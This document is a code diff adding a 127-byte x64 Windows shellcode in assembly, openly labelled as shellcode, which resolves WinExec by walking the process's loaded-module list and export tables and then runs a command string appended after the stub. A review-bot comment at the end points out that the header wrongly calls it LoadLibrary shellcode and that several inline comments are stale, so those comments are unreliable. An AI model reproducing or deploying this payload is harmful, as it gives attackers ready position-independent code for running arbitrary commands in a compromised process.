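--- a/[unknown-path]
+++ b/[unknown-path]
@@ -0,0 +1,101 @@
+;
+; Copyright © 2017 Odzhan. All Rights Reserved.
+;
+; Redistribution and use in source and binary forms, with or without
+; modification, are permitted provided that the following conditions are
+; met:
+;
+; 1. Redistributions of source code must retain the above copyright
+; notice, this list of conditions and the following disclaimer.
+;
+; 2. Redistributions in binary form must reproduce the above copyright
+; notice, this list of conditions and the following disclaimer in the
+; documentation and/or other materials provided with the distribution.
+;
+; 3. The name of the author may not be used to endorse or promote products
+; derived from this software without specific prior written permission.
+;
+; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+; POSSIBILITY OF SUCH DAMAGE.
+;
+
+; 127 byte LoadLibrary shellcode for x64 windows
+; Uses the Export Address Table
+; odzhan
+
+%include "include.inc"
+
+bits 64
+
+pushx rsi , rdi , rbx , rbp
+sub rsp , 28h
+jmp load_cmd
+init_cmd:
+pop r10
+push TEB.ProcessEnvironmentBlock
+pop r11
+mov rax , [ gs : r11 ]
+mov rax , [ rax + PEB.Ldr ]
+mov rdi , [ rax + PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink ]
+jmp scan_dll
+next_dll:
+mov rdi , [ rdi + LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink ]
+scan_dll:
+mov rbx , [ rdi + LDR_DATA_TABLE_ENTRY.DllBase ]
+test rbx , rbx
+jz exit_load
+
+mov eax , [ rbx + IMAGE_DOS_HEADER.e_lfanew ]
+add eax , r11d
+mov ecx , [ rbx + rax + IMAGE_NT_HEADERS.OptionalHeader + \
+IMAGE_OPTIONAL_HEADER.DataDirectory + \
+IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
+IMAGE_DATA_DIRECTORY.VirtualAddress - \
+TEB.ProcessEnvironmentBlock ]
+jecxz next_dll
+lea rsi , [ rbx + rcx + IMAGE_EXPORT_DIRECTORY.NumberOfNames ]
+lodsd
+xchg eax , ecx
+jecxz next_dll ; skip if no names
+; rdx = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
+lodsd
+xchg eax , edx
+add rdx , rbx ; rax = RVA2VA(rdx, rbx)
+; rbp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
+lodsd
+xchg eax , ebp
+add rbp , rbx ; rbp = RVA2VA(rbp, rbx)
+; rax = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
+lodsd
+xchg eax , esi
+add rsi , rbx ; rsi = RVA(rax, rbx)
+find_api:
+mov eax , [ rbp + rcx * 4 - 4 ] ; eax = RVA of API string
+cmp dword [ rax + rbx ], 'WinE'
+loopne find_api ; --ecx && Load not found
+jnz next_dll
+movzx eax , word [ rsi + rcx * 2 ] ; eax = AddressOfNameOrdinals[eax]
+mov ecx , [ rdx + rax * 4 ] ; ecx = base + AddressOfFunctions[eax]
+add rbx , rcx
+push r10
+pop rcx
+push SW_SHOWNORMAL
+pop rdx
+call rbx
+exit_load:
+add rsp , 28h
+popx rsi , rdi , rbx , rbp
+ret
+load_cmd:
+call init_cmd
+; command goes here
+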
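Review bot: The header comment near the top of the hunk calls this a LoadLibrary shellcode, but the export scan compares names against `'WinE'` and the final call passes r10 (the address of the trailing command string) in rcx and SW_SHOWNORMAL in rdx, which is the WinExec(lpCmdLine, uCmdShow) contract, so the line should read `; 127 byte WinExec shellcode for x64 windows`. Several end-of-line comments are also stale: the one after `add rdx , rbx` names rax instead of rdx and should be `; rdx = RVA2VA(rdx, rbx)`, the one after `add rsi , rbx` should be `; rsi = RVA2VA(rsi, rbx)`, and the one on `mov ecx , [ rdx + rax * 4 ]` says the base is already added when that only happens on the following `add rbx , rcx`. It is worth a comment at `find_api` that the `cmp dword` is a four-byte prefix match taken from whichever module in InLoadOrderModuleList exports such a name first, and that forwarded exports are not resolved, so the result depends on the host process's module list. The 28h frame plus the four pushes only leaves rsp 16-byte aligned at `call rbx` if rsp was 8 mod 16 on entry, which holds when the stub is reached via `call`; that assumption belongs in the header alongside the clobber list (r10, r11, rax, rcx, rdx and flags are not preserved).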